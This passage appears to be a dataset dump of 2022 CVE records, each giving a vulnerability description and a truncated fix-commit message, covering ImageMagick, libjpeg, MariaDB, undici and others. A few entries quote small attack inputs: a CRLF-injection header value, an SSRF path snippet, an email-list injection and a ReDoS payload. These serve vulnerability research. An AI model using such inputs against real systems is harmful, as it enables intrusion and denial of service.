CVE-2022-31564\n\n[{'lang': 'en', 'value': 'The woduq1414/munhak-moa repository before 2022-05-03 on GitHub allows absolute path traversal because the Flask send_file function is used unsafely.'}]\n\nFix commit: # Absolute Path Traversal due to incorrect use of `send_file` call\n\nA path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” seq", "cve_id": "CVE-2022-31564", "source": "cvefixes", "timestamp": ""} {"id": "2d50e3f26cbd07d537b2", "text": "CVE: CVE-2022-31620\n\n[{'lang': 'en', 'value': 'In libjpeg before 1.64, BitStream::Get in bitstream.hpp has an assertion failure that may cause denial of service. This is related to out-of-bounds array access during arithmetically coded lossless scan or arithmetically coded sequential scan.'}]\n\nFix commit: Added out-of-bounds checks for lossless symbol decoding and AC context\nindices. Worked around some gcc warnings. Bumped to 1.64.", "cve_id": "CVE-2022-31620", "source": "cvefixes", "timestamp": ""} {"id": "0dce5071f0683d217423", "text": "CVE: CVE-2022-31621\n\n[{'lang': 'en', 'value': 'MariaDB Server before 10.7 is vulnerable to Denial of Service. In extra/mariabackup/ds_xbstream.cc, when an error occurs (stream_ctxt->dest_file == NULL) while executing the method xbstream_open, the held lock is not released correctly, which allows local users to trigger a denial of service due to the deadlock.'}]\n\nFix commit: MDEV-26574 An improper locking bug due to unreleased lock in the ds_xbstream.cc\n\nrelease lock in all as cases n xbstream_op", "cve_id": "CVE-2022-31621", "source": "cvefixes", "timestamp": ""} {"id": "7d58c31934840f600cb7", "text": "CVE: CVE-2022-31622\n\n[{'lang': 'en', 'value': 'MariaDB Server before 10.7 is vulnerable to Denial of Service. In extra/mariabackup/ds_compress.cc, when an error occurs (pthread_create returns a nonzero value) while executing the method create_worker_threads, the held lock is not released correctly, which allows local users to trigger a denial of service due to the deadlock.'}]\n\nFix commit: MDEV-26561 Fix a bug due to unreleased lock\n\nFix a bug of unreleased lock ctrl_mutex in the method create_w", "cve_id": "CVE-2022-31622", "source": "cvefixes", "timestamp": ""} {"id": "762152664ca1c287bf79", "text": "CVE: CVE-2022-31623\n\n[{'lang': 'en', 'value': 'MariaDB Server before 10.7 is vulnerable to Denial of Service. In extra/mariabackup/ds_compress.cc, when an error occurs (i.e., going to the err label) while executing the method create_worker_threads, the held lock thd->ctrl_mutex is not released correctly, which allows local users to trigger a denial of service due to the deadlock.'}]\n\nFix commit: MDEV-26561 mariabackup release locks\n\nThe previous threads locked need to be released too.\n\nThis occu", "cve_id": "CVE-2022-31623", "source": "cvefixes", "timestamp": ""} {"id": "c969891c856af4cdb3dc", "text": "CVE: CVE-2022-31624\n\n[{'lang': 'en', 'value': 'MariaDB Server before 10.7 is vulnerable to Denial of Service. While executing the plugin/server_audit/server_audit.c method log_statement_ex, the held lock lock_bigbuffer is not released correctly, which allows local users to trigger a denial of service due to the deadlock.'}]\n\nFix commit: MDEV-26556 An improper locking bug(s) due to unreleased lock.\n\nGet rid of the global big_buffer.", "cve_id": "CVE-2022-31624", "source": "cvefixes", "timestamp": ""} {"id": "bf146f6f9645fa20c2c8", "text": "CVE: CVE-2022-31796\n\n[{'lang': 'en', 'value': 'libjpeg 1.63 has a heap-based buffer over-read in HierarchicalBitmapRequester::FetchRegion in hierarchicalbitmaprequester.cpp because the MCU size can be different between allocation and use.'}]\n\nFix commit: The code now checks for consistency of the MCU sizes across\nhierarchical levels, and fails in case they are different.", "cve_id": "CVE-2022-31796", "source": "cvefixes", "timestamp": ""} {"id": "bd78b7ae2f4c5286f24f", "text": "CVE: CVE-2022-32065\n\n[{'lang': 'en', 'value': 'An arbitrary file upload vulnerability in the background management module of RuoYi v4.7.3 and below allows attackers to execute arbitrary code via a crafted HTML file.'}]\n\nFix commit: 用户头像上传格式限制", "cve_id": "CVE-2022-32065", "source": "cvefixes", "timestamp": ""} {"id": "7a6b26502d132ffb0f6a", "text": "CVE: CVE-2022-32074\n\n[{'lang': 'en', 'value': 'A stored cross-site scripting (XSS) vulnerability in the component audit/class.audit.php of osTicket-plugins - Storage-FS before commit a7842d494889fd5533d13deb3c6a7789768795ae allows attackers to execute arbitrary web scripts or HTML via a crafted SVG file.'}]\n\nFix commit: Merge pull request #229 from JediKev/security/latest-security-patches-05-2022\n\nReviewed-By: JediKev , aydreeihn ", "cve_id": "CVE-2022-32074", "source": "cvefixes", "timestamp": ""} {"id": "6bb05a4fd0b20ffc4761", "text": "CVE: CVE-2022-32200\n\n[{'lang': 'en', 'value': 'libdwarf 0.4.0 has a heap-based buffer over-read in _dwarf_check_string_valid in dwarf_util.c.'}]\n\nFix commit: Fixes vulnerability DW202205-001\nReports error instead of crashing the when reading\na specially crafted (corrupted) .debug_pubnames\nor .debug_pubtypes section.\n\tmodified: src/lib/libdwarf/dwarf_global.c", "cve_id": "CVE-2022-32200", "source": "cvefixes", "timestamp": ""} {"id": "2182634042e5c2dcc8ce", "text": "CVE: CVE-2022-32201\n\n[{'lang': 'en', 'value': 'In libjpeg 1.63, there is a NULL pointer dereference in Component::SubXOf in component.hpp.'}]\n\nFix commit: Added a check whether all components in a scan are actually present.", "cve_id": "CVE-2022-32201", "source": "cvefixes", "timestamp": ""} {"id": "c56e76bd755366895e84", "text": "CVE: CVE-2022-32202\n\n[{'lang': 'en', 'value': 'In libjpeg 1.63, there is a NULL pointer dereference in LineBuffer::FetchRegion in linebuffer.cpp.'}]\n\nFix commit: Fixed a NULL-pointer access in the line-based reconstruction process\nin case no valid scan was found and no data is present.", "cve_id": "CVE-2022-32202", "source": "cvefixes", "timestamp": ""} {"id": "c35ef8243edc7a4eb6dc", "text": "CVE: CVE-2022-32323\n\n[{'lang': 'en', 'value': 'AutoTrace v0.40.0 was discovered to contain a heap overflow via the ReadImage function at input-bmp.c:660.'}]\n\nFix commit: Merge pull request #72 from lemenkov/misleading_indentation\n\nMisleading indentation", "cve_id": "CVE-2022-32323", "source": "cvefixes", "timestamp": ""} {"id": "f3c9136ecea1c049437f", "text": "CVE: CVE-2022-32414\n\n[{'lang': 'en', 'value': 'Nginx NJS v0.7.2 was discovered to contain a segmentation violation in the function njs_vmcode_interpreter at src/njs_vmcode.c.'}]\n\nFix commit: Fixed aggregation methods of Promise ctor with array-like object.\n\nPreviously, while iterating over an array-like object the methods may be\nresolved with INVALID values. INVALID value is a special internal type which\nshould never be visible by ordinary functions.\n\nThe fix is to ensure that absent elements ar", "cve_id": "CVE-2022-32414", "source": "cvefixes", "timestamp": ""} {"id": "aeb00cd8c029be130e8e", "text": "CVE: CVE-2022-32545\n\n[{'lang': 'en', 'value': \"A vulnerability was found in ImageMagick, causing an outside the range of representable values of type 'unsigned char' at coders/psd.c, when crafted or untrusted input is processed. This leads to a negative impact to application availability or other problems related to undefined behavior.\"}]\n\nFix commit: fix issue: outside the range of representable values of type 'unsigned int' at coders/psd.c:1025 (#4963)\n\n* fix Division by zero in XMenuWidget() ", "cve_id": "CVE-2022-32545", "source": "cvefixes", "timestamp": ""} {"id": "0c3b77baa1fe51d50664", "text": "CVE: CVE-2022-32545\n\n[{'lang': 'en', 'value': \"A vulnerability was found in ImageMagick, causing an outside the range of representable values of type 'unsigned char' at coders/psd.c, when crafted or untrusted input is processed. This leads to a negative impact to application availability or other problems related to undefined behavior.\"}]\n\nFix commit: Pull request: https://github.com/ImageMagick/ImageMagick/pull/4963", "cve_id": "CVE-2022-32545", "source": "cvefixes", "timestamp": ""} {"id": "a4b514bc0a4ba2959250", "text": "CVE: CVE-2022-32546\n\n[{'lang': 'en', 'value': \"A vulnerability was found in ImageMagick, causing an outside the range of representable values of type 'unsigned long' at coders/pcl.c, when crafted or untrusted input is processed. This leads to a negative impact to application availability or other problems related to undefined behavior.\"}]\n\nFix commit: Fixes #4985: 4e+26 is outside the range of representable values of type 'unsigned long' at coders/pcl.c:299 (#4986)\n\n* fix Division by zero in XMe", "cve_id": "CVE-2022-32546", "source": "cvefixes", "timestamp": ""} {"id": "5e736021f6d0cd77de33", "text": "CVE: CVE-2022-32546\n\n[{'lang': 'en', 'value': \"A vulnerability was found in ImageMagick, causing an outside the range of representable values of type 'unsigned long' at coders/pcl.c, when crafted or untrusted input is processed. This leads to a negative impact to application availability or other problems related to undefined behavior.\"}]\n\nFix commit: https://github.com/ImageMagick/ImageMagick/pull/4986", "cve_id": "CVE-2022-32546", "source": "cvefixes", "timestamp": ""} {"id": "ee3808cfce4382232e3a", "text": "CVE: CVE-2022-32547\n\n[{'lang': 'en', 'value': \"In ImageMagick, there is load of misaligned address for type 'double', which requires 8 byte alignment and for type 'float', which requires 4 byte alignment at MagickCore/property.c. Whenever crafted or untrusted input is processed by ImageMagick, this causes a negative impact to application availability or other problems related to undefined behavior.\"}]\n\nFix commit: https://github.com/ImageMagick/ImageMagick/pull/5034", "cve_id": "CVE-2022-32547", "source": "cvefixes", "timestamp": ""} {"id": "a8a09caf8ccb0fc238c9", "text": "CVE: CVE-2022-32547\n\n[{'lang': 'en', 'value': \"In ImageMagick, there is load of misaligned address for type 'double', which requires 8 byte alignment and for type 'float', which requires 4 byte alignment at MagickCore/property.c. Whenever crafted or untrusted input is processed by ImageMagick, this causes a negative impact to application availability or other problems related to undefined behavior.\"}]\n\nFix commit: fix #5033: runtime error: load of misaligned address (#5034)\n\n* fix Division by ze", "cve_id": "CVE-2022-32547", "source": "cvefixes", "timestamp": ""} {"id": "ecf7f8a0713b2ff80755", "text": "CVE: CVE-2022-32978\n\n[{'lang': 'en', 'value': 'There is an assertion failure in SingleComponentLSScan::ParseMCU in singlecomponentlsscan.cpp in libjpeg before 1.64 via an empty JPEG-LS scan.'}]\n\nFix commit: Fixed handling of empty JPEG-LS scans.", "cve_id": "CVE-2022-32978", "source": "cvefixes", "timestamp": ""} {"id": "dbff4bf731e8865bf4ae", "text": "CVE: CVE-2022-32983\n\n[{'lang': 'en', 'value': 'Knot Resolver through 5.5.1 may allow DNS cache poisoning when there is an attempt to limit forwarding actions by filters.'}]\n\nFix commit: policy docs: warn about filters and forwarding\n\nWe've been notified about possibility of \"cache poisoning\" this way,\nso let's document this drawback to make the expectations clearer.", "cve_id": "CVE-2022-32983", "source": "cvefixes", "timestamp": ""} {"id": "c52ac295eaf9e1e8bce6", "text": "CVE: CVE-2022-33068\n\n[{'lang': 'en', 'value': 'An integer overflow in the component hb-ot-shape-fallback.cc of Harfbuzz v4.3.0 allows attackers to cause a Denial of Service (DoS) via unspecified vectors.'}]\n\nFix commit: [sbix] Limit glyph extents\n\nFixes https://github.com/harfbuzz/harfbuzz/issues/3557", "cve_id": "CVE-2022-33068", "source": "cvefixes", "timestamp": ""} {"id": "7e45831cc0d6eea8f698", "text": "CVE: CVE-2022-33099\n\n[{'lang': 'en', 'value': 'An issue in the component luaG_runerror of Lua v5.4.4 and below leads to a heap-buffer overflow when a recursive error occurs.'}]\n\nFix commit: Save stack space while handling errors\n\nBecause error handling (luaG_errormsg) uses slots from EXTRA_STACK,\nand some errors can recur (e.g., string overflow while creating an\nerror message in 'luaG_runerror', or a C-stack overflow before calling\nthe message handler), the code should use stack slots with parsi", "cve_id": "CVE-2022-33099", "source": "cvefixes", "timestamp": ""} {"id": "4d3922414a012e2eed88", "text": "CVE: CVE-2022-33105\n\n[{'lang': 'en', 'value': 'Redis v7.0 was discovered to contain a memory leak via the component streamGetEdgeID.'}]\n\nFix commit: Fix memory leak in streamGetEdgeID (#10753)\n\nsi is initialized by streamIteratorStart(), we should call\r\nstreamIteratorStop() on it when done.\r\n\r\nregression introduced in #9127 (redis 7.0)", "cve_id": "CVE-2022-33105", "source": "cvefixes", "timestamp": ""} {"id": "d55bbbd9b2a1039b6b08", "text": "CVE: CVE-2022-33127\n\n[{'lang': 'en', 'value': 'The function that calls the diff tool in Diffy 3.4.1 does not properly handle double quotes in a filename when run in a windows environment. This allows attackers to execute arbitrary commands via a crafted string.'}]\n\nFix commit: Remove windows specific exec. Open2.capture3 should work on all\nplatforms.", "cve_id": "CVE-2022-33127", "source": "cvefixes", "timestamp": ""} {"id": "2e26ca9f602f231d851d", "text": "CVE: CVE-2022-33146\n\n[{'lang': 'en', 'value': 'Open redirect vulnerability in web2py versions prior to 2.22.5 allows a remote attacker to redirect a user to an arbitrary web site and conduct a phishing attack by having a user to access a specially crafted URL.'}]\n\nFix commit: improved open redirect prevention", "cve_id": "CVE-2022-33146", "source": "cvefixes", "timestamp": ""} {"id": "bbbae09b015d06fe17d0", "text": "CVE: CVE-2022-33146\n\n[{'lang': 'en', 'value': 'Open redirect vulnerability in web2py versions prior to 2.22.5 allows a remote attacker to redirect a user to an arbitrary web site and conduct a phishing attack by having a user to access a specially crafted URL.'}]\n\nFix commit: added validation of send attribute in admin", "cve_id": "CVE-2022-33146", "source": "cvefixes", "timestamp": ""} {"id": "bb986001c6775f5f5409", "text": "CVE: CVE-2022-33172\n\n[{'lang': 'en', 'value': \"de.fac2 1.34 allows bypassing the User Presence protection mechanism when there is malware on the victim's PC.\"}]\n\nFix commit: Update README.md", "cve_id": "CVE-2022-33172", "source": "cvefixes", "timestamp": ""} {"id": "562b77f9a8762adbddf4", "text": "CVE: CVE-2022-33981\n\n[{'lang': 'en', 'value': 'drivers/block/floppy.c in the Linux kernel before 5.17.6 is vulnerable to a denial of service, because of a concurrency use-after-free flaw after deallocating raw_cmd in the raw_cmd_ioctl function.'}]\n\nFix commit: floppy: disable FDRAWCMD by default\n\nMinh Yuan reported a concurrency use-after-free issue in the floppy code\nbetween raw_cmd_ioctl and seek_interrupt.\n\n[ It turns out this has been around, and that others have reported the\n KASAN splats ", "cve_id": "CVE-2022-33981", "source": "cvefixes", "timestamp": ""} {"id": "dca6efee0b48b5eecd2f", "text": "CVE: CVE-2022-34033\n\n[{'lang': 'en', 'value': 'HTMLDoc v1.9.15 was discovered to contain a heap overflow via (write_header) /htmldoc/htmldoc/html.cxx:273.'}]\n\nFix commit: Fix a crash bug with bogus text (Issue #426)", "cve_id": "CVE-2022-34033", "source": "cvefixes", "timestamp": ""} {"id": "0605ca6724139f36caf6", "text": "CVE: CVE-2022-34033\n\n[{'lang': 'en', 'value': 'HTMLDoc v1.9.15 was discovered to contain a heap overflow via (write_header) /htmldoc/htmldoc/html.cxx:273.'}]\n\nFix commit: Fix a crash bug with empty titles (Issue #425)", "cve_id": "CVE-2022-34033", "source": "cvefixes", "timestamp": ""} {"id": "c59f987106fc6f0b945f", "text": "CVE: CVE-2022-34035\n\n[{'lang': 'en', 'value': 'HTMLDoc v1.9.12 and below was discovered to contain a heap overflow via e_node htmldoc/htmldoc/html.cxx:588.'}]\n\nFix commit: Fix a crash bug with bogus text (Issue #426)", "cve_id": "CVE-2022-34035", "source": "cvefixes", "timestamp": ""} {"id": "dfbb5df2d4331387351e", "text": "CVE: CVE-2022-34035\n\n[{'lang': 'en', 'value': 'HTMLDoc v1.9.12 and below was discovered to contain a heap overflow via e_node htmldoc/htmldoc/html.cxx:588.'}]\n\nFix commit: Fix a crash bug with empty titles (Issue #425)", "cve_id": "CVE-2022-34035", "source": "cvefixes", "timestamp": ""} {"id": "ae4b1ccf4367eaffd159", "text": "CVE: CVE-2022-34132\n\n[{'lang': 'en', 'value': 'Benjamin BALET Jorani v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at application/controllers/Leaves.php.'}]\n\nFix commit: BF:Prevent SQL injection fix #369", "cve_id": "CVE-2022-34132", "source": "cvefixes", "timestamp": ""} {"id": "ffbf334d524abbd2f02a", "text": "CVE: CVE-2022-34133\n\n[{'lang': 'en', 'value': 'Benjamin BALET Jorani v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Comment parameter at application/controllers/Leaves.php.'}]\n\nFix commit: BF:Persistent XSS fix #369", "cve_id": "CVE-2022-34133", "source": "cvefixes", "timestamp": ""} {"id": "44ae751d6e321760b3ae", "text": "CVE: CVE-2022-34134\n\n[{'lang': 'en', 'value': 'Benjamin BALET Jorani v1.0 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /application/controllers/Users.php.'}]\n\nFix commit: BF:security on users mgt with CSRF token fix #369", "cve_id": "CVE-2022-34134", "source": "cvefixes", "timestamp": ""} {"id": "7cf4ccfe5338d53acb94", "text": "CVE: CVE-2022-34295\n\n[{'lang': 'en', 'value': 'totd before 1.5.3 does not properly randomize mesg IDs.'}]\n\nFix commit: Patch provided by Gabor Lencse for generating better randomized mesg IDs.", "cve_id": "CVE-2022-34295", "source": "cvefixes", "timestamp": ""} {"id": "6357a6b81f8f91083dc2", "text": "CVE: CVE-2022-34299\n\n[{'lang': 'en', 'value': 'There is a heap-based buffer over-read in libdwarf 0.4.0. This issue is related to dwarf_global_formref_b.'}]\n\nFix commit: Fixes old bug(which could result in Denial of Service)\ndue to a missing check before reading the 8 bytes of a DW_FORM_ref_sig8.\nDW202206-001\n\tmodified: src/lib/libdwarf/dwarf_form.c", "cve_id": "CVE-2022-34299", "source": "cvefixes", "timestamp": ""} {"id": "6c3e3a83b7f3ef014059", "text": "CVE: CVE-2022-34494\n\n[{'lang': 'en', 'value': 'rpmsg_virtio_add_ctrl_dev in drivers/rpmsg/virtio_rpmsg_bus.c in the Linux kernel before 5.18.4 has a double free.'}]\n\nFix commit: rpmsg: virtio: Fix possible double free in rpmsg_virtio_add_ctrl_dev()\n\nvch will be free in virtio_rpmsg_release_device() when\nrpmsg_ctrldev_register_device() fails. There is no need to call\nkfree() again.\n\nFixes: c486682ae1e2 (\"rpmsg: virtio: Register the rpmsg_char device\")\nSigned-off-by: Hangyu Hua \n", "cve_id": "CVE-2022-34494", "source": "cvefixes", "timestamp": ""} {"id": "4e14629622be19713663", "text": "CVE: CVE-2022-34495\n\n[{'lang': 'en', 'value': 'rpmsg_probe in drivers/rpmsg/virtio_rpmsg_bus.c in the Linux kernel before 5.18.4 has a double free.'}]\n\nFix commit: rpmsg: virtio: Fix possible double free in rpmsg_probe()\n\nvch will be free in virtio_rpmsg_release_device() when\nrpmsg_ns_register_device() fails. There is no need to call kfree() again.\n\nFix this by changing error path from free_vch to free_ctrldev.\n\nFixes: c486682ae1e2 (\"rpmsg: virtio: Register the rpmsg_char device\")\nSigned-off-by:", "cve_id": "CVE-2022-34495", "source": "cvefixes", "timestamp": ""} {"id": "4333c3169518bde19ece", "text": "CVE: CVE-2022-34749\n\n[{'lang': 'en', 'value': 'In mistune through 2.0.2, support of inline markup is implemented by using regular expressions that can involve a high amount of backtracking on certain edge cases. This behavior is commonly named catastrophic backtracking.'}]\n\nFix commit: Fix asteris emphasis regex CVE-2022-34749", "cve_id": "CVE-2022-34749", "source": "cvefixes", "timestamp": ""} {"id": "7efc0bf0fb5c358a8fbd", "text": "CVE: CVE-2022-34835\n\n[{'lang': 'en', 'value': 'In Das U-Boot through 2022.07-rc5, an integer signedness error and resultant stack-based buffer overflow in the \"i2c md\" command enables the corruption of the return address pointer of the do_i2c_md function.'}]\n\nFix commit: i2c: fix stack buffer overflow vulnerability in i2c md command\n\nWhen running \"i2c md 0 0 80000100\", the function do_i2c_md parses the\nlength into an unsigned int variable named length. The value is then\nmoved to a signed variabl", "cve_id": "CVE-2022-34835", "source": "cvefixes", "timestamp": ""} {"id": "f5d3b1cfd24095ddd3d2", "text": "CVE: CVE-2022-34927\n\n[{'lang': 'en', 'value': 'MilkyTracker v1.03.00 was discovered to contain a stack overflow via the component LoaderXM::load. This vulnerability is triggered when the program is supplied a crafted XM module file.'}]\n\nFix commit: Fix possible stack corruption with XM instrument headers claiming a size of less than 4\n\nCloses #275", "cve_id": "CVE-2022-34927", "source": "cvefixes", "timestamp": ""} {"id": "5b64c9c4f976565c3b90", "text": "CVE: CVE-2022-35153\n\n[{'lang': 'en', 'value': 'FusionPBX 5.0.1 was discovered to contain a command injection vulnerability via /fax/fax_send.php.'}]\n\nFix commit: Security use escapeshellarg", "cve_id": "CVE-2022-35153", "source": "cvefixes", "timestamp": ""} {"id": "833d06b474bbe0004b85", "text": "CVE: CVE-2022-35153\n\n[{'lang': 'en', 'value': 'FusionPBX 5.0.1 was discovered to contain a command injection vulnerability via /fax/fax_send.php.'}]\n\nFix commit: Add escapeshellarg to the variables used in the command line.", "cve_id": "CVE-2022-35153", "source": "cvefixes", "timestamp": ""} {"id": "21fca1efba34014a0314", "text": "CVE: CVE-2022-35173\n\n[{'lang': 'en', 'value': 'An issue was discovered in Nginx NJS v0.7.5. The JUMP offset for a break instruction was not set to a correct offset during code generation, leading to a segmentation violation.'}]\n\nFix commit: Fixed break instruction in a try-catch block.\n\nPreviously, JUMP offset for a break instruction inside a try-catch\nblock was not set to a correct offset during code generation\nwhen a return instruction was present in inner try-catch block.\n\nThe fix is to updat", "cve_id": "CVE-2022-35173", "source": "cvefixes", "timestamp": ""} {"id": "b458192a6cdc6c4c6871", "text": "CVE: CVE-2022-35213\n\n[{'lang': 'en', 'value': 'Ecommerce-CodeIgniter-Bootstrap before commit 56465f was discovered to contain a cross-site scripting (XSS) vulnerability via the function base_url() at /blog/blogpublish.php.'}]\n\nFix commit: hot fixes", "cve_id": "CVE-2022-35213", "source": "cvefixes", "timestamp": ""} {"id": "fbd3ce0f1ebd3469f782", "text": "CVE: CVE-2022-35411\n\n[{'lang': 'en', 'value': 'rpc.py through 0.6.0 allows Remote Code Execution because an unpickle occurs when the \"serializer: pickle\" HTTP header is sent. In other words, although JSON (not Pickle) is the default data format, an unauthenticated client can cause the data to be processed with unpickle.'}]\n\nFix commit: PickleSerializer is turned off by default", "cve_id": "CVE-2022-35411", "source": "cvefixes", "timestamp": ""} {"id": "c7a8ca0a7bb6d049bec7", "text": "CVE: CVE-2022-35414\n\n[{'lang': 'en', 'value': 'softmmu/physmem.c in QEMU through 7.0.0 can perform an uninitialized read on the translate_fail path, leading to an io_readx or io_writex crash.'}]\n\nFix commit: softmmu: Always initialize xlat in address_space_translate_for_iotlb\n\nThe bug is an uninitialized memory read, along the translate_fail\npath, which results in garbage being read from iotlb_to_section,\nwhich can lead to a crash in io_readx/io_writex.\n\nThe bug may be fixed by writing any value", "cve_id": "CVE-2022-35414", "source": "cvefixes", "timestamp": ""} {"id": "86a3c0a235f5154eecb5", "text": "CVE: CVE-2022-35414\n\n[{'lang': 'en', 'value': 'softmmu/physmem.c in QEMU through 7.0.0 can perform an uninitialized read on the translate_fail path, leading to an io_readx or io_writex crash.'}]\n\nFix commit: target/loongarch: Clean up tlb when cpu reset\n\nWe should make sure that tlb is clean when cpu reset.\n\nSigned-off-by: Song Gao \nMessage-Id: <20220705070950.2364243-1-gaosong@loongson.cn>\nReviewed-by: Richard Henderson \nSigned-off-by: Richard ", "cve_id": "CVE-2022-35414", "source": "cvefixes", "timestamp": ""} {"id": "bc7b35deab2b070295b4", "text": "CVE: CVE-2022-35861\n\n[{'lang': 'en', 'value': 'pyenv 1.2.24 through 2.3.2 allows local users to gain privileges via a .python-version file in the current working directory. An attacker can craft a Python version string in .python-version to execute shims under their control. (Shims are executables that pass a command along to a specific version of pyenv. The version string is used to construct the path to the command, and there is no validation of whether the version specified is a valid version", "cve_id": "CVE-2022-35861", "source": "cvefixes", "timestamp": ""} {"id": "9a5c1986de981987b10b", "text": "CVE: CVE-2022-35917\n\n[{'lang': 'en', 'value': 'Solana Pay is a protocol and set of reference implementations that enable developers to incorporate decentralized payments into their apps and services. When a Solana Pay transaction is located using a reference key, it may be checked to represent a transfer of the desired amount to the recipient, using the supplied `validateTransfer` function. An edge case regarding this mechanism could cause the validation logic to validate multiple transfers. Thi", "cve_id": "CVE-2022-35917", "source": "cvefixes", "timestamp": ""} {"id": "dab1353e5ccc434583f5", "text": "CVE: CVE-2022-35918\n\n[{'lang': 'en', 'value': 'Streamlit is a data oriented application development framework for python. Users hosting Streamlit app(s) that use custom components are vulnerable to a directory traversal attack that could leak data from their web server file-system such as: server logs, world readable files, and potentially other sensitive information. An attacker can craft a malicious URL with file paths and the streamlit server would process that URL and return the contents of ", "cve_id": "CVE-2022-35918", "source": "cvefixes", "timestamp": ""} {"id": "759424f9e8a16ee66c6f", "text": "CVE: CVE-2022-35919\n\n[{'lang': 'en', 'value': \"MinIO is a High Performance Object Storage released under GNU Affero General Public License v3.0. In affected versions all 'admin' users authorized for `admin:ServerUpdate` can selectively trigger an error that in response, returns the content of the path requested. Any normal OS system would allow access to contents at any arbitrary paths that are readable by MinIO process. Users are advised to upgrade. Users unable to upgrade may disable ServerUpd", "cve_id": "CVE-2022-35919", "source": "cvefixes", "timestamp": ""} {"id": "d2fc7029030b53dacf98", "text": "CVE: CVE-2022-35921\n\n[{'lang': 'en', 'value': \"fof/byobu is a private discussions extension for Flarum forum. Affected versions were found to not respect private discussion disablement by users. Users of Byobu should update the extension to version 1.1.7, where this has been patched. Users of Byobu with Flarum 1.0 or 1.1 should upgrade to Flarum 1.2 or later, or evaluate the impact this issue has on your forum's users and choose to disable the extension if needed. There are no workarounds for th", "cve_id": "CVE-2022-35921", "source": "cvefixes", "timestamp": ""} {"id": "4d2ef2efa52e4b948475", "text": "CVE: CVE-2022-35922\n\n[{'lang': 'en', 'value': 'Rust-WebSocket is a WebSocket (RFC6455) library written in Rust. In versions prior to 0.26.5 untrusted websocket connections can cause an out-of-memory (OOM) process abort in a client or a server. The root cause of the issue is during dataframe parsing. Affected versions would allocate a buffer based on the declared dataframe size, which may come from an untrusted source. When `Vec::with_capacity` fails to allocate, the default Rust allocator will a", "cve_id": "CVE-2022-35922", "source": "cvefixes", "timestamp": ""} {"id": "0af3d242d1fce38b476a", "text": "CVE: CVE-2022-35923\n\n[{'lang': 'en', 'value': \"v8n is a javascript validation library. Versions of v8n prior to 1.5.1 were found to have an inefficient regular expression complexity in the `lowercase()` and `uppercase()` regex which could lead to a denial of service attack. In testing of the `lowercase()` function a payload of 'a' + 'a'.repeat(i) + 'A' with 32 leading characters took 29443 ms to execute. The same issue happens with uppercase(). Users are advised to upgrade. There are no known wo", "cve_id": "CVE-2022-35923", "source": "cvefixes", "timestamp": ""} {"id": "9ab8992eef9d2b41ac65", "text": "CVE: CVE-2022-35924\n\n[{'lang': 'en', 'value': 'NextAuth.js is a complete open source authentication solution for Next.js applications. `next-auth` users who are using the `EmailProvider` either in versions before `4.10.3` or `3.29.10` are affected. If an attacker could forge a request that sent a comma-separated list of emails (eg.: `attacker@attacker.com,victim@victim.com`) to the sign-in endpoint, NextAuth.js would send emails to both the attacker and the victim\\'s e-mail addresses. The attack", "cve_id": "CVE-2022-35924", "source": "cvefixes", "timestamp": ""} {"id": "42cc38696ae1648b0d56", "text": "CVE: CVE-2022-35928\n\n[{'lang': 'en', 'value': 'AES Crypt is a file encryption software for multiple platforms. AES Crypt for Linux built using the source on GitHub and having the version number 3.11 has a vulnerability with respect to reading user-provided passwords and confirmations via command-line prompts. Passwords lengths were not checked before being read. This vulnerability may lead to buffer overruns. This does _not_ affect source code found on aescrypt.com, nor is the vulnerability pres", "cve_id": "CVE-2022-35928", "source": "cvefixes", "timestamp": ""} {"id": "6873da200b9921062850", "text": "CVE: CVE-2022-35929\n\n[{'lang': 'en', 'value': 'cosign is a container signing and verification utility. In versions prior to 1.10.1 cosign can report a false positive if any attestation exists. `cosign verify-attestation` used with the `--type` flag will report a false positive verification when there is at least one attestation with a valid signature and there are NO attestations of the type being verified (--type defaults to \"custom\"). This can happen when signing with a standard keypair and wi", "cve_id": "CVE-2022-35929", "source": "cvefixes", "timestamp": ""} {"id": "8dbc89d91a8eb84ca279", "text": "CVE: CVE-2022-35930\n\n[{'lang': 'en', 'value': 'PolicyController is a utility used to enforce supply chain policy in Kubernetes clusters. In versions prior to 0.2.1 PolicyController will report a false positive, resulting in an admission when it should not be admitted when there is at least one attestation with a valid signature and there are NO attestations of the type being verified (--type defaults to \"custom\"). An example image that can be used to test this is `ghcr.io/distroless/static@sha25", "cve_id": "CVE-2022-35930", "source": "cvefixes", "timestamp": ""} {"id": "c3bf28eeacd875e99d7d", "text": "CVE: CVE-2022-35936\n\n[{'lang': 'en', 'value': \"Ethermint is an Ethereum library. In Ethermint running versions before `v0.17.2`, the contract `selfdestruct` invocation permanently removes the corresponding bytecode from the internal database storage. However, due to a bug in the `DeleteAccount`function, all contracts that used the identical bytecode (i.e shared the same `CodeHash`) will also stop working once one contract invokes `selfdestruct`, even though the other contracts did not invoke the", "cve_id": "CVE-2022-35936", "source": "cvefixes", "timestamp": ""} {"id": "94e2b8ef9b6a40e61918", "text": "CVE: CVE-2022-35942\n\n[{'lang': 'en', 'value': \"Improper input validation on the `contains` LoopBack filter may allow for arbitrary SQL injection. When the extended filter property `contains` is permitted to be interpreted by the Postgres connector, it is possible to inject arbitrary SQL which may affect the confidentiality and integrity of data stored on the connected database. A patch was released in version 5.5.1. This affects users who does any of the following: - Connect to the database via ", "cve_id": "CVE-2022-35942", "source": "cvefixes", "timestamp": ""} {"id": "2302b6c33aa9e0548036", "text": "CVE: CVE-2022-35948\n\n[{'lang': 'en', 'value': \"undici is an HTTP/1.1 client, written from scratch for Node.js.`=< undici@5.8.0` users are vulnerable to _CRLF Injection_ on headers when using unsanitized input as request headers, more specifically, inside the `content-type` header. Example: ``` import { request } from 'undici' const unsanitizedContentTypeInput = 'application/json\\\\r\\\\n\\\\r\\\\nGET /foo2 HTTP/1.1' await request('http://localhost:3000, { method: 'GET', headers: { 'content-type': unsan", "cve_id": "CVE-2022-35948", "source": "cvefixes", "timestamp": ""} {"id": "731b9b3c788b4b38b1a3", "text": "CVE: CVE-2022-35949\n\n[{'lang': 'en', 'value': 'undici is an HTTP/1.1 client, written from scratch for Node.js.`undici` is vulnerable to SSRF (Server-side Request Forgery) when an application takes in **user input** into the `path/pathname` option of `undici.request`. If a user specifies a URL such as `http://127.0.0.1` or `//127.0.0.1` ```js const undici = require(\"undici\") undici.request({origin: \"http://example.com\", pathname: \"//127.0.0.1\"}) ``` Instead of processing the request as 